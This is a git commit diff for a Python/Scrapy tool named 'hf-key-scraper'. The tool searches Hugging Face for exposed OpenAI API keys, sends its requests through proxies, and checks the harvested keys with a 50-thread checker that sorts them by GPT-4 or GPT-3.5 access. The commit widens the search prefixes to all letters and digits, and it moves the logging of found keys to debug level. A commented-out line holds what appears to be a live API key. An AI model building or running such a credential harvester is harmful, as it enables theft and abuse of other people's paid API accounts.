final commit

Cyberes 2023-10-20 18:54:11 -06:00
parent 15759586e4
commit c13c224b36
6 changed files with 27 additions and 20 deletions

.gitignore

@@ -1,4 +1,6 @@
 .idea
+found-keys*.txt
 # ---> Python
 # Byte-compiled / optimized / DLL files

README.md

@@ -1,3 +1,5 @@
 # hf-key-scraper
-Scrape for OpenAI keys on Hugging Face
+Scrape for OpenAI keys on Hugging Face.
+
+This requires at least one Squid proxy to function. Define your proxies in `settings.py` -> `PROXIES`.
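As a minimal sketch of that setting: each `PROXIES` entry points at one Squid instance, which listens on port 3128 by default (the second address below is a hypothetical placeholder, not taken from the repository).

# settings.py (sketch) -- one entry per Squid proxy the scraper can route requests through
PROXIES = [
    "http://127.0.0.1:3128",  # a local Squid instance on its default port
    "http://10.0.0.2:3128",   # hypothetical second proxy, for rotation across instances
]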


@@ -1,8 +1,9 @@
 import argparse
-import concurrent
 from concurrent.futures import ThreadPoolExecutor
 from pathlib import Path
+from tqdm import tqdm
 
 from keychecker.check import check_key
@@ -17,26 +18,29 @@ def process_key(key):
 def main():
     parser = argparse.ArgumentParser(description='Scrape data from chub.ai.')
-    parser.add_argument('input_file', help='Path to the file containing the keys.')
+    parser.add_argument('input_file', nargs='*', help='Path to the file containing the keys.')
     args = parser.parse_args()
-    input_file = Path(args.input_file).resolve().absolute()
-    if not input_file.exists():
-        print('Input file does not exist:', input_file)
-        quit(1)
-    with open(input_file) as f:
-        content = set(f.read().splitlines())
+    keys = set()
+    for file in args.input_file:
+        input_file = Path(file).resolve().expanduser().absolute()
+        if not input_file.exists():
+            print('Input file does not exist:', input_file)
+            quit(1)
+        data = set(input_file.read_text().splitlines())
+        keys = keys | data
 
     # content = ['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']
+    print('Checking', len(keys), 'keys...')
 
     gpt_4 = set()
     gpt_4_32k = set()
     gpt_3 = set()
+    pbar = tqdm(total=len(keys))
 
     with ThreadPoolExecutor(max_workers=50) as executor:
-        results = executor.map(process_key, content)
+        results = executor.map(process_key, keys)
         for result in results:
             if result is not None:
                 if result['has_gpt_4']:
@@ -45,6 +49,8 @@ def main():
                     gpt_4_32k.add(result['api_key'])
                 if result['has_only_turbo']:
                     gpt_3.add(result['api_key'])
+            pbar.update(1)
+    pbar.close()
 
     print('')
     print('GPT4 KEYS:')

settings.py

@@ -92,10 +92,7 @@ TWISTED_REACTOR = "twisted.internet.asyncioreactor.AsyncioSelectorReactor"
 FEED_EXPORT_ENCODING = "utf-8"
 
 PROXIES = [
-    "http://172.0.4.7:3128",
-    "http://172.0.4.8:3128",
-    "http://172.0.4.10:3128",
-    "http://172.0.4.12:3128",
+    "http://127.0.0.1:3128"
 ]
 
 LOG_LEVEL = 'CRITICAL'


@@ -31,5 +31,5 @@ class HuggingfaceSpider(CrawlSpider):
         text = response.text
         matches = self.regex.findall(text)
         if matches:
-            self.logger.error(f"{matches}")
+            self.logger.debug(f"{matches}")
             return FoundItem(url=response.url, matches=matches)


@@ -4,14 +4,14 @@ import time
 import coloredlogs
 import scrapy
+from string import ascii_lowercase, ascii_uppercase
 
 from ..pipelines import FoundItem
 
 
 class HFSearchSpider(scrapy.Spider):
     name = "huggingface_search"
     allowed_domains = ["huggingface.co"]
-    start_urls = ['https://huggingface.co/search/full-text?q=sk-{}&limit=100&skip={}'.format(i, j * 100) for i in ['a', 'h', 'm', 'q'] for j in range(10)]
+    start_urls = ['https://huggingface.co/search/full-text?q=sk-{}&limit=100&skip={}'.format(i, j * 100) for i in [*ascii_lowercase, *ascii_uppercase, *range(10), 'etk', 'ant'] for j in range(10)]
     logger = logging.getLogger('HFSearchSpider')
     logger.setLevel(logging.DEBUG)
     coloredlogs.install(logger=logger, level=logging.DEBUG)
@@ -27,5 +27,5 @@ class HFSearchSpider(scrapy.Spider):
         for key in keys:
             found_keys.add(''.join(key))
         if len(found_keys):
-            self.logger.error(f"{found_keys}")
+            self.logger.debug(f"{found_keys}")
             yield FoundItem(url=response.url, matches=found_keys)